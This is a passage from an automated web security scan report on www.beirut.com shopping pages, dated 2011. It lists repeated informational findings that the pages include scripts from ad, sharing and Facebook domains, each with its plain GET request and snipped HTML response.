Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.666. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:50:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.667. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:19:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.668. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Roastary/78

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Roastary/78

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Roastary/78 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:11:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.669. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/45 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:22:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.670. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.671. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:47:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.672. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:19:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.673. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.674. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:00:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.675. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.676. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Equipment-Gadgets/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.677. http://www.beirut.com/Shopping/Home-Furnishings/4120758082

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:37 GMT
Server: Apache/2.2.3 (CentOS)
